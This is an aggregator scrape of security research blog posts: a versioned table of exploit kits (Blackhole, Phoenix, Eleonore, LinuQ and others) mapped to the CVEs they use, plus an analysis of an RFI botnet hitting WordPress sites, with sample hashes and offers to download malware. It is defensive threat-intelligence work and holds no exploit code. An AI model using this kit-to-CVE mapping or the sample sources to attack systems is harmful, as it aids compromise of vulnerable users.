Exploit Pack ================= CVE-2006-0003 CVE-2009-0927 CVE-2010-0094 CVE-2010-0188 CVE-2010-0806 CVE-2010-0840 CVE-2010-1297 CVE-2010-1885 CVE-2011-0611 JavaSignedApplet Siberia Private ========== CVE-2005-0055 CVE-2006-0003 CVE-2007-5659 CVE-2008-2463 CVE-2008-2992 CVE-2009-0075 CVE-2009-0927 CVE-2009-3867 CVE-2009-4324 CVE-2010-0806 Techno XPack =========== CVE-2008-2992 CVE-2010-0188 CVE-2010-0842 CVE-2010-1297 CVE-2010-2884 CVE-2010-3552 CVE-2010-3654 JavaSignedApplet "Yang Pack" ========= CVE-2010-0806 CVE-2011-2110 CVE-2011-2140 CVE-2011-354 Version 14. January 19, 2012 Image may be NSFW. Clik here to view. Version 14 Exploit Pack table additions: Credits for the excellent Wild Wild West (October 2011 edition) go to kahusecurity.com With many thanks to XyliBox (Xylitol - Steven), Malware Intelligence blog, and xakepy.cc for the information: > > 1. Blackhole 1.2.1 (Java Rhino added, weaker Java exploits removed) > > 2. Blackhole 1.2.1 (Java Skyline added) > > 3. Sakura Exploit Pack 1.0 (new kid on the block, private pack) > > 4. Phoenix 2.8. mini (condensed version of 2.7) > > 5. Fragus Black (weak Spanish twist on the original, black colored admin > > panel, a few old exploits added) If you find any errors or CVE information for packs not featured , please send it to my email (in my profile above, thank you very much) . Image may be NSFW. Clik here to view. Image may be NSFW. Clik here to view. Image may be NSFW. Clik here to view. Image may be NSFW. Clik here to view. The full table in xls format - Version 14 can be downloaded from here. The exploit pack table in XLSX format The exploit pack table in csv format The references sheet in csv format P.S. There are always corrections and additions thanks to your feedback after the document release, come back in a day or two to check in case v.15 is out. Version 13. Aug 20, 2011 Kahusecurity issued an updated version of their Wild Wild West graphic that will help you learn Who is Who in the world of exploit packs. You can view the full version of their post in the link above. Version 13 exploit pack table additions: 1. Bleeding Life 3.0 2. Merry Christmas Pack (many thanks to kahusecurity.com)+ 3. Best Pack (many thanks to kahusecurity.com) 4. Sava Pack (many thanks to kahusecurity.com) 5. LinuQ 6. Eleonore 1.6.5 7. Zero Pack 8. Salo Pack (incomplete but it is also old) List of packs in the table in alphabetical order 1. Best Pack 2. Blackhole Exploit 1.0 3. Blackhole Exploit 1.1 4. Bleeding Life 2.0 5. Bleeding Life 3.0 6. Bomba 7. CRIMEPACK 2.2.1 8. CRIMEPACK 2.2.8 9. CRIMEPACK 3.0 10. CRIMEPACK 3.1.3 11. Dloader 12. EL Fiiesta 13. Eleonore 1.3.2 14. Eleonore 1.4.1 15. Eleonore 1.4.4 Moded 16. Eleonore 1.6.3a 17. Eleonore 1.6.4 18. Eleonore 1.6.5 19. Fragus 1 20. Icepack 21. Impassioned Framework 1.0 22. Incognito 23. iPack 24. JustExploit 25. Katrin 26. Merry Christmas Pack 27. Liberty 1.0.7 28. Liberty 2.1.0* 29. LinuQ pack 30. Lupit 31. Mpack 32. Mushroom/unknown 33. Open Source Exploit (Metapack) 34. Papka 35. Phoenix 2.0 36. Phoenix 2.1 37. Phoenix 2.2 38. Phoenix 2.3 39. Phoenix 2.4 40. Phoenix 2.5 41. Phoenix 2.7 42. Robopak 43. Salo pack 44. Sava Pack 45. SEO Sploit pack 46. Siberia 47. T-Iframer 48. Unique Pack Sploit 2.1 49. Webattack 50. Yes Exploit 3.0RC 51. Zero Pack 52. Zombie Infection kit 53. Zopack ---------------------------------------------- Bleeding Life 3.0 New Version Ad is here Image may be NSFW. Clik here to view. Merry Christmas Pack read analysis at kahusecurity.com Image may be NSFW. Clik here to view. Best Pack read analysis at kahusecurity.com Image may be NSFW. Clik here to view. Sava Pack read analysis at kahusecurity.com Image may be NSFW. Clik here to view. Eleonore 1.6.5 [+] CVE-2011-0611 [+] CVE-2011-0559 [+] CVE-2010-4452 [-] CVE-2010-0886 Image may be NSFW. Clik here to view. Salo Pack Old (2009), added just for the collection Image may be NSFW. Clik here to view. Zero Pack 62 exploits from various packs (mostly Open Source pack) Image may be NSFW. Clik here to view. LinuQ pack Image may be NSFW. Clik here to view. Designed to compromise linux servers using vulnerable PHPMyAdmin. Comes with DDoS bot but any kind of code can be loaded for Linux botnet creation. LinuQ pack is PhpMyAdmin exploit pack with 4 PMA exploits based on a previous Russian version of the Romanian PMA scanner ZmEu. it is not considered to be original, unique, new, or anything special. All exploits are public and known well. It is designed to be installed on an IRC server (like UnrealIRCD). IP ranges already listed in bios.txt can be scanned, vulnerable IPs and specific PMA vulnerabilities will be listed in vuln.txt, then the corresponding exploits can be launched against the vulnerable server. It is more like a bot using PMA vulnerabilities than exploit pack. It is using CVE-2009-1148 (unconfirmed) CVE-2009-1149 (unconfirmed) CVE-2009-1150 (unconfirmed) CVE-2009-1151 (confirmed) Image may be NSFW. Clik here to view. ==================================================================== Version 12. May 26, 2011 additional changes (many thanks to kahusecurity.com) Bomba Papka See the list of packs covered in the list below The full table in xls format - Version 12 can be downloaded from here. I want to thank everyone who sent packs and information :) Image may be NSFW. Clik here to view. Version 11 May 26, 2011 Changes: Image may be NSFW. Clik here to view. 1. Phoenix2.7 2. "Dloader"(well, dloader is a loader but the pack is some unnamed pack http://damagelab.org/lofiversion/index.php?t=20852) 3. nuclear pack 4. Katrin 5. Robopak 6. Blackhole exploit kit 1.1.0 7. Mushroom/unknown 8. Open Source Exploit kit Image may be NSFW. Clik here to view. ==================================================================== 10. May 8, 2011 Version 10 Exploit Pack Table_V10May11 First, I want to thank everyone who sent and posted comments for updates and corrections. *** The Wild Wild West picture is from a great post about evolution of exploit packs by Kahu Security Wild Wild West Update As usual, send your corrections and update lists. Image may be NSFW. Clik here to view. Changes: > > * Eleonore 1.6.4 > > * Eleonore 1.6.3a > > * Incognito > > * Blackhole Go1Pack (not included) as reported as being a fake pack, here is a gui. Here is a threatpost article referencing it as it was used for an attack Also, here is another article claiming it is not a fake http://community.websense.com/blogs/securitylabs/archive/2011/04/19/Mass-Injections-Leading-to-g01pack-Exploit-Kit.aspx Go1 Pack CVE are reportedly CVE-2006-0003 CVE-2009-0927 CVE-2010-1423 CVE-2010-1885 Does anyone have this pack or see it offered for sale? Exploit kits I am planning to analyze and add (and/or find CVE listing for) are: * Open Source Exploit Kit * SALO * K0de Legend: Black color entries by Francois Paget Red color entries by Gunther Blue color entries by Mila Also, here is a great presentation by Ratsoul (Donato Ferrante) about Java Exploits (http://www.inreverse.net/?p=1687) -------------------------------------------------------- 9. April 5, 2011 Version 9 ExploitPackTable_V9Apr11 It actually needs another update but I am posting it now and will issue version 10 as soon as I can. Changes: Phoenix 2.5 IFramer Tornado Bleeding life Many thanks to Gunther for his contributions. If you wish to add some, please send your info together with the reference links. Also please feel free to send corrections if you notice any mistakes Image may be NSFW. Clik here to view. Image may be NSFW. Clik here to view. Image may be NSFW. Clik here to view. 8. Update 8 Oct 22, 2010 Version 8 ExploitPackTable_V8Oct22-10 Changes: Image may be NSFW. Clik here to view.Image may be NSFW. Clik here to view. 1. Eleonore 1.4.4 Moded added (thanks to malwareint.blogspot.com) 2. Correctionon CVE-2010-0746 in Phoenix 2.2 and 2.3. It is a mistake and the correct CVE is CVE-2010-0886 (thanks to ♫ etonshell for noticing) 3. SEO Sploit pack added (thanks to whsbehind.blogspot.com, evilcodecave.blogspot.com and blog.ahnlab.com) 7. Update 7 Oct 18, 2010 Version 7 ExploitPackTable_V7Oct18-10 released thanks to SecNichewe have updates for Phoenix 2.4 :) We also added shorthand/slang/abbreviated names for exploits for easy matching of exploits to CVE in the future. Please send us more information re packs, exploit names that can be added in the list. Thank you! Image may be NSFW. Clik here to view. 6. Update 6 Sept 27, 2010 Version 6 ExploitPackTable_V6Sept26-10 released Thanks to Francois Paget (McAfee) we have updates for Phoenix 2.2 and Phoenix 2.3 5. Update 5. Sept 27, 2010 Version 5 ExploitPackTable_V5Sept26-10 released Added updates for Phoenix 2.1 and Crimepack 3.1.3 Image may be NSFW. Clik here to view.Image may be NSFW. Clik here to view. 4 Update 4 July 23, 2010 Version 4 ExploitPackTable_V4Ju23-10 released. Added a new Russian exploit kit called Zombie Infection Kit to the table. Read more at malwareview.com Image may be NSFW. Clik here to view. Update 3 July 7, 2010. Please read more about this on the Brian Krebs' blogPirate Bay Hack Exposes User Booty Update 2 June 27, 2010 Sorry but Impassioned Framework is back where it belongs - blue Update 1 June 24, 2010Eleonore 1.4.1 columns was updated to include the correct list of the current exploits. Francois Paget www.avertlabs.com kindly agreed to allow us to make additions to his Overview of Exploit Packs table published on Avertlabs (McAfee Blog) Many thanks to Gunther from ARTeam for his help with the update. There are a few blanks and question marks, please do no hesitate to email me if you know the answer or if you see any errors. Please click on the image below to expand it (it is a partial screenshot) Impassioned Framework is tentatively marked a different color because the author claims it is a security audit tool not exploit pack. However, there was no sufficient information provided yet to validate such claims. The pack is temporarily/tentatively marked a different color. We'll keep you posted. Image may be NSFW. Clik here to view. DEEPEND RESEARCH - LIBRARY OF MALWARE TRAFFIC PATTERNS May 6, 2013, 3:17 am Next DeepEnd Research: Under this rock... Vulnerable Wordpress/Joomla sites... Overview of the RFI botnet malware arsenal Previous An Overview of Exploit Packs (Update 19.1) April 2013 0 0 Image may be NSFW. Clik here to view. Update May 6, 2013 We added ability to download corresponding samples and pcaps (when available) Traffic analysis has been the primary method of malware identification and thousands of IDS signatures developed are the daily proof. Signatures definitely help but ability to visually recognize malware traffic patterns and see the trends when they change has been always an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as "personal notes" spreadsheet with GET and POST requests for different malware families with information from open sources. We decided others might find it useful too. >> read more on DeepEnd Research DEEPEND RESEARCH: UNDER THIS ROCK... VULNERABLE WORDPRESS/JOOMLA SITES... OVERVIEW OF THE RFI BOTNET MALWARE ARSENAL May 31, 2013, 10:19 pm Next Defcon 21 Archives Speaker Materials Previous DeepEnd Research - Library of Malware Traffic Patterns 0 0 Image may be NSFW. Clik here to view.Exploits directed at Wordpress and/or Joomla content management systems(CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved. One such infection scheme is essentially the following: A downloader trojan (Mutopy - Win32) (20a6ebf61243b760dd65f897236b6ad3 Virustotal) instructs the infected host to download: 1) Remote File Injector "Symmi" (Win32) 7958f73daf4b84e3b00e008258ea2e7a Virustotal 2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08 Virustotal 3) PHP scripts for injecting into compromised Wordpress sites. Among them a PHP spambot (victimized site owners often get alerted about copious amount of meds and spam porn emanating from their sites). This is also the source of varied links for spam using thousands of various links redirecting to the same sites (e.g. weightloss, work at home scams, or porn sites) Read more at DeepEnd Research>>> Download files (see below) Image may be NSFW. Clik here to view. Download the nalware files (Email me if you need the password) Download the pcap files (Email me if you need the password) Wordpress_PHP_1FFD37807740EBCB7DAD044ACF866100_up.php 1ffd37807740ebcb7dad044acf866100 Wordpress_PHP_5F0BB0851B3A2838C34CF21400F22A7E_copy.php 5f0bb0851b3a2838c34cf21400f22a7e Wordpress_PHP_7CCDCC3FF09262CAFE5DC953C0552254_seek.cgi 7ccdcc3ff09262cafe5dc953c0552254 Wordpress_PHP_9B6D87C50B58104E204481C580E630F1_sm14e.php 9b6d87c50b58104e204481c580e630f1 Wordpress_PHP_35DBB397351622B86E421EE8ABA095DE_fu.php 35dbb397351622b86e421ee8aba095de Wordpress_PHP_45B02538063124A0FECC0987410B1A65_ru.php 45b02538063124a0fecc0987410b1a65 Wordpress_PHP_821BB092136A73EAA2CA803E6DBB658A_del.php 821bb092136a73eaa2ca803e6dbb658a Wordpress-Mutopy_20A6EBF61243B760DD65F897236B6AD3.exe_ 20a6ebf61243b760dd65f897236b6ad3 Wordpress_DroppedbyMutopy_93F2D4ED74F7CCBF8E41F4D9D0B3BF98_Twain002.Mtx_ 93f2d4ed74f7ccbf8e41f4d9d0b3bf98 Wordpress_SDbot_AAEE52BFB589F6534C4B51E3B144DC08_svchost.exe_ aaee52bfb589f6534c4b51e3b144dc08 Worpress_Symmi_7958F73DAF4B84E3B00E008258EA2E7A_conhost.exe_ 7958f73daf4b84e3b00e008258ea2e7a Viewing all 71 articles Page 1 Page 2 Page 3 Last Page Browse latest View live -------------------------------------------------------------------------------- More Pages to Explore ..... * //balance45635.rssing.com/chan-54706115/index-page1.html * //fotoprojekt184.rssing.com/chan-13995928/index-latest.php * //fairpoint13.rssing.com/chan-25642720/index-latest.php * //renfrew1027.rssing.com/chan-25642328/article9.html * //ultimate88121.rssing.com/chan-71876906/index-page1.html * //cosmetici105.rssing.com/chan-13994936/article10.html * //point5495.rssing.com/chan-13995514/index-latest.php * //lyricsupload173.rssing.com/chan-25642715/article16.html * //actiniomorpha72.rssing.com/chan-71876497/index-latest.php * //sampan895.rssing.com/chan-25642411/index-page1.html * //warehouse325729.rssing.com/chan-71876710/index-page1.html * //catharisme12.rssing.com/chan-30287052/index-page1.html * //balance54102.rssing.com/chan-45959760/index-latest.php * //thinkering51.rssing.com/chan-13995122/index-latest.php * //equipment88148.rssing.com/chan-71877441/index-page1.html * //macarthur821.rssing.com/chan-13995065/index-latest.php * //ultimate88098.rssing.com/chan-71876511/index-latest.php * //greed940.rssing.com/chan-45959318/index-page1.html * //capsules586.rssing.com/chan-25642677/index-page1.html * //weworemasks464.rssing.com/chan-54706165/index-page1.html -------------------------------------------------------------------------------- click here for Latest and Popular articles on SAP ERP click here for Latest and Popular articles on Mesothelioma and Asbestos -------------------------------------------------------------------------------- Search RSSing.com -------------------------------------------------------------------------------- TOP-RATED IMAGES NEW! K-12 DISPLAY BULLETIN BOARDS FOR GRADE 5 (1ST QUARTER) FRANK BURGON – HARTLEPOOL TRAUMPRINZ - MOTHERCAVE (2013) SONG WORKSHEET: I KNEW YOU WERE TROUBLE BY TAYLOR SWIFT FAST FOOD READING WORKSHEET II علاجـ سحر القرينـ☎️00905527800080رقمـ معالجـ ـالروحانيـ KANYE WEST’S SEXY NEW ALBUM! KANYE WEST PERFORMING AT... HOW TO CREATE FOLDERS IN DOCUMENT SETS WITHOUT UPLOADING FILES WILLIAM MARLOW JAIL BOOKINGS DEADLY WIVES: REBEKAH MARLENE MELLON SHOT & KILLED HER HUSBAND, DONALD, THEN WATCHED WHILE HE LAY DYING – ALL CAUGHT ON VIDEO; SENTENCED TO 20 YEARS IN PRISON VANI RANI 15-10-2015 – SUN TV (EPISODE 779) OMAR HERRERA INTAKE MANIFOLD 05-07 VW JETTA MK5 - 1.9 TDI BRM DIESEL - 03G 129 713 K CLASS 9 SANSKRIT GRAMMAR BOOK SOLUTIONS अपठित अवबोधनम् 25 COLORFUL HOLI RANGOLI DESIGNS MARCUS SEMIEN’S WIFE TARAH (MURREY) SEMIEN DIPHU MEDICAL COLLEGE RECRUITMENT 2019 : APPLY ONLINE FOR 282 GRADE-III (NON-TECHNICAL) POSTS @ DME.ASSAM.GOV.IN [LAST DATE EXTENDED] EXPRESSION TO CREATE EVEN DISTANCES GARMIN CITY NAVIGATOR WESTERN EUROPE NTU 2020.20 UNLOCKED LATEST IMAGES ANNI '70 MICKEY MOUSE DIPINTI D'ARTE NOVITÀ STAMPA CAMICIA TAG TAGLIA... August 28, 2022, 3:10 pm ATKINSONS, SUPPLIERS OF THE FINEST IRISH POPLIN TIES SINCE 1820 September 10, 2022, 3:00 am CHANGE MOUSE POINTER TO PHOTO September 9, 2022, 6:13 am GOODWIN & CO. (USA) - (N162) CHAMPIONS September 9, 2022, 4:00 am FILL LISTVIEW OR MSFLEXGRID B ASED YEAR VARIABLE September 8, 2022, 10:59 pm CADUCEUS FRESNEL September 7, 2022, 9:19 pm VA - LOVE SAVES THE DAY, A HISTORY OF AMERICAN DANCE MUSIC CULTURE 1970-1979... September 7, 2022, 9:12 pm COULD A BRAIN IMPLANT TREAT BINGE EATING DISORDER? August 31, 2022, 5:31 am 'FÁCIL', AN ORIGINAL MOVISTAR PLUS+ SERIES, TO SCREEN AT SAN SEBASTIAN FESTIVAL August 29, 2022, 3:00 pm LEASE ROUNDUP: BRICK & TIMBER, UBS NAB TENANTS August 29, 2022, 7:30 am ANNI '70 MICKEY MOUSE DIPINTI D'ARTE NOVITÀ STAMPA CAMICIA TAG TAGLIA... August 28, 2022, 3:10 pm ATKINSONS, SUPPLIERS OF THE FINEST IRISH POPLIN TIES SINCE 1820 September 10, 2022, 3:00 am click here for Latest and Popular articles on Search Engine Optimization (SEO) * RSSing>> * Latest * Popular * Top Rated * Trending © 2022 //www.rssing.com